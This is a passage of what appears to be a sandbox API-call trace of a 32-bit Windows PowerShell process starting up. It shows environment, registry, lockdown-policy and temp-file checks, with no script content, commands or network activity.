GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.096] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xb7ad50 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0099.102] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0099.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xaf1300, nSize=0x104 | out: lpBuffer="℠µ۠³㊴瘹㊤瘹\x0e") returned 0x0 [0099.102] CoTaskMemFree (pv=0xaf1300) [0099.104] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0099.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xaf1300, nSize=0x104 | out: lpBuffer="℠µ۠³㊴瘹㊤瘹\x0e") returned 0x0 [0099.104] CoTaskMemFree (pv=0xaf1300) [0099.104] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0099.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xaf1300, nSize=0x104 | out: lpBuffer="℠µ۠³㊴瘹㊤瘹\x0e") returned 0x0 [0099.104] CoTaskMemFree (pv=0xaf1300) [0099.223] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0099.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xaf1300, nSize=0x104 | out: lpBuffer="℠µ۠³㊴瘹㊤瘹\x0e") returned 0x0 [0099.223] CoTaskMemFree (pv=0xaf1300) [0099.252] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.416] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0099.416] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0099.417] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0099.417] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0099.417] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0099.417] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0099.417] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0099.417] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0099.417] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0099.417] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0099.417] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.417] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.417] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0099.417] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0099.424] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.526] ReportEventW (hEventLog=0x74e0004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4aeec28*="Available", lpRawData=0x4aeeb50) returned 1 [0099.538] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0099.538] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0xaf1300, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0099.539] CoTaskMemFree (pv=0xaf1300) [0099.540] GetCurrentProcessId () returned 0xd2c [0099.541] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e7e0 | out: phkResult=0x74e7e0*=0x620) returned 0x0 [0099.542] RegQueryValueExW (in: hKey=0x620, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e800, lpData=0x0, lpcbData=0x74e7fc*=0x0 | out: lpType=0x74e800*=0x1, lpData=0x0, lpcbData=0x74e7fc*=0x56) returned 0x0 [0099.542] RegQueryValueExW (in: hKey=0x620, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e800, lpData=0x4af59b0, lpcbData=0x74e7fc*=0x56 | out: lpType=0x74e800*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x74e7fc*=0x56) returned 0x0 [0099.542] RegCloseKey (hKey=0x620) returned 0x0 [0099.647] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xb7ad50 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0099.648] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.648] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0099.648] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0099.649] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0099.649] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0099.649] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9 [0099.649] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x9, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0099.649] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0099.649] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy")) returned 0x10 [0099.649] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0099.649] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0099.649] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.649] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0099.649] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x18 [0099.649] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x18, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0099.651] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0100.180] EtwEventRegister (in: ProviderId=0x4b04030, EnableCallback=0x4772d7e, CallbackContext=0x0, RegHandle=0x4b0400c | out: RegHandle=0x4b0400c) returned 0x0 [0100.180] EtwEventSetInformation (RegHandle=0x6fce450, InformationClass=0x55, EventInformation=0x2, InformationLength=0x4b03fd0) returned 0x0 [0100.185] EnumerateTraceGuidsEx () returned 0x0 [0100.185] GetCurrentProcessId () returned 0xd2c [0100.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Winevt\\Publishers\\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x74d8ac | out: phkResult=0x74d8ac*=0x0) returned 0x2 [0100.469] GetCurrentProcessId () returned 0xd2c [0100.790] CoTaskMemAlloc (cb=0x20c) returned 0xb52120 [0100.790] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xb52120, nSize=0x104 | out: lpBuffer="ᵠ·ºINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\shlwapi.dll") returned 0x0 [0100.790] CoTaskMemFree (pv=0xb52120) [0101.540] EtwEventWriteTransfer (RegHandle=0xb08968, EventDescriptor=0x2e, ActivityId=0x74e9c0, RelatedActivityId=0x74e960, UserDataCount=0x0, UserData=0x0) returned 0x0 [0101.540] GetCurrentProcessId () returned 0xd2c [0101.541] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0xd2c) returned 0x6a0 [0101.541] GetProcessTimes (in: hProcess=0x6a0, lpCreationTime=0x4b33ce8, lpExitTime=0x4b33cf0, lpKernelTime=0x4b33cf8, lpUserTime=0x4b33d00 | out: lpCreationTime=0x4b33ce8, lpExitTime=0x4b33cf0, lpKernelTime=0x4b33cf8, lpUserTime=0x4b33d00) returned 1 [0101.541] CloseHandle (hObject=0x6a0) returned 1 [0101.546] CoTaskMemAlloc (cb=0x20c) returned 0x709eb58 [0101.546] GetSystemDirectoryW (in: lpBuffer=0x709eb58, uSize=0x104 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0101.547] CoTaskMemFree (pv=0x709eb58) [0101.547] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0101.547] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0101.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e7a8) returned 1 [0101.547] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x74e824 | out: lpFileInformation=0x74e824*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa1c22f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fa1c22f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fa1c22f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe840)) returned 1 [0101.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e7a4) returned 1 [0101.660] WldpGetLockdownPolicy () returned 0x10000000 [0101.661] CoTaskMemAlloc (cb=0x20c) returned 0x709eb58 [0101.661] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x709eb58 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0101.661] CoTaskMemFree (pv=0x709eb58) [0101.661] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0101.661] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x24, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0101.661] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0101.661] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", nBufferLength=0x24, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x23 [0101.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e79c) returned 1 [0101.661] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp"), fInfoLevelId=0x0, lpFileInformation=0x74e818 | out: lpFileInformation=0x74e818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x75079d24, ftLastAccessTime.dwHighDateTime=0x1d5df27, ftLastWriteTime.dwLowDateTime=0x75079d24, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0101.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e798) returned 1 [0101.665] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0101.665] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1", nBufferLength=0x49, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1", lpFilePart=0x0) returned 0x48 [0101.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e6e4) returned 1 [0101.666] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_f45tlhc5.4ms.ps1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6b4 [0101.666] GetFileType (hFile=0x6b4) returned 0x1 [0101.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e6e0) returned 1 [0101.666] GetFileType (hFile=0x6b4) returned 0x1 [0101.667] WriteFile (in: hFile=0x6b4, lpBuffer=0x4b36778*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x74e760, lpOverlapped=0x0 | out: lpBuffer=0x4b36778*, lpNumberOfBytesWritten=0x74e760*=0x1, lpOverlapped=0x0) returned 1 [0101.668] CloseHandle (hObject=0x6b4) returned 1 [0101.668] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0101.668] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1", nBufferLength=0x4a, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1", lpFilePart=0x0) returned 0x49 [0101.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e6e4) returned 1 [0101.668] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_mmhw12k5.tmd.psm1"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6b4 [0101.669] GetFileType (hFile=0x6b4) returned 0x1 [0101.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e6e0) returned 1 [0101.669] GetFileType (hFile=0x6b4) returned 0x1 [0101.669] WriteFile (in: hFile=0x6b4, lpBuffer=0x4b38cc4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x74e760, lpOverlapped=0x0 | out: lpBuffer=0x4b38cc4*, lpNumberOfBytesWritten=0x74e760*=0x1, lpOverlapped=0x0) returned 1 [0101.670] CloseHandle (hObject=0x6b4) returned 1 [0101.671] CoTaskMemAlloc (cb=0x92) returned 0xb8a890 [0101.671] IdentifyCodeAuthzLevelW () returned 0x1 [0101.829] CoTaskMemFree (pv=0xb8a890) [0101.829] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0101.830] CloseCodeAuthzLevel () returned 0x1 [0101.830] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0101.830] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1", nBufferLength=0x49, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1", lpFilePart=0x0) returned 0x48 [0101.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e7a4) returned 1 [0101.830] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_f45tlhc5.4ms.ps1"), fInfoLevelId=0x0, lpFileInformation=0x74e820 | out: lpFileInformation=0x74e820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e920a4f, ftCreationTime.dwHighDateTime=0x1d5df27, ftLastAccessTime.dwLowDateTime=0x9e920a4f, ftLastAccessTime.dwHighDateTime=0x1d5df27, ftLastWriteTime.dwLowDateTime=0x9e920a4f, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0101.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e7a0) returned 1 [0101.831] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x49 [0101.831] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1", nBufferLength=0x49, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1", lpFilePart=0x0) returned 0x48 [0101.831] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_f45tlhc5.4ms.ps1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_f45tlhc5.4ms.ps1")) returned 1 [0101.832] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0101.832] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1", nBufferLength=0x4a, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1", lpFilePart=0x0) returned 0x49 [0101.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e7a4) returned 1 [0101.832] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_mmhw12k5.tmd.psm1"), fInfoLevelId=0x0, lpFileInformation=0x74e820 | out: lpFileInformation=0x74e820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e920a4f, ftCreationTime.dwHighDateTime=0x1d5df27, ftLastAccessTime.dwLowDateTime=0x9e920a4f, ftLastAccessTime.dwHighDateTime=0x1d5df27, ftLastWriteTime.dwLowDateTime=0x9e920a4f, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0101.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e7a0) returned 1 [0101.833] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4a [0101.833] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1", nBufferLength=0x4a, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1", lpFilePart=0x0) returned 0x49 [0101.833] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mmhw12k5.tmd.psm1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\__psscriptpolicytest_mmhw12k5.tmd.psm1")) returned 1 [0101.834] GetSystemInfo (in: lpSystemInfo=0x74e858 | out: lpSystemInfo=0x74e858*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0101.834] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e7e8 | out: phkResult=0x74e7e8*=0x6b8) returned 0x0 [0101.835] RegQueryValueExW (in: hKey=0x6b8, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x74e804, lpData=0x0, lpcbData=0x74e800*=0x0 | out: lpType=0x74e804*=0x0, lpData=0x0, lpcbData=0x74e800*=0x0) returned 0x2 [0101.835] RegCloseKey (hKey=0x6b8) returned 0x0 [0101.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e834 | out: phkResult=0x74e834*=0x6b8) returned 0x0 [0101.879] RegQueryValueExW (in: hKey=0x6b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e854, lpData=0x0, lpcbData=0x74e850*=0x0 | out: lpType=0x74e854*=0x1, lpData=0x0, lpcbData=0x74e850*=0x56) returned 0x0 [0101.879] RegQueryValueExW (in: hKey=0x6b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e854, lpData=0x4b3a26c, lpcbData=0x74e850*=0x56 | out: lpType=0x74e854*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x74e850*=0x56) returned 0x0 [0101.879] RegCloseKey (hKey=0x6b8) returned 0x0 [0101.880] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e834 | out: phkResult=0x74e834*=0x6b8) returned 0x0 [0101.880] RegQueryValueExW (in: hKey=0x6b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e854, lpData=0x0, lpcbData=0x74e850*=0x0 | out: lpType=0x74e854*=0x1, lpData=0x0, lpcbData=0x74e850*=0x56) returned 0x0 [0101.880] RegQueryValueExW (in: hKey=0x6b8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e854, lpData=0x4b3a5e4, lpcbData=0x74e850*=0x56 | out: lpType=0x74e854*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x74e850*=0x56) returned 0x0 [0101.880] RegCloseKey (hKey=0x6b8) returned 0x0 [0101.891] CoTaskMemAlloc (cb=0x20c) returned 0x709eb58 [0101.891] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x709eb58 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0101.892] CoTaskMemFree (pv=0x709eb58) [0101.892] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0101.892] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0101.892] CoTaskMemAlloc (cb=0x20c) returned 0x709eb58 [0101.892] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x709eb58 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0101.892] CoTaskMemFree (pv=0x709eb58) [0101.892] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0101.892] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0101.894] QueryPerformanceFrequency (in: lpFrequency=0xc44da0 | out: lpFrequency=0xc44da0*=100000000) returned 1 [0101.989] QueryPerformanceCounter (in: lpPerformanceCount=0x74e8f4 | out: lpPerformanceCount=0x74e8f4*=19574133105) returned 1 [0101.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0101.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x37, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0101.990] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e804) returned 1 [0101.990] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, 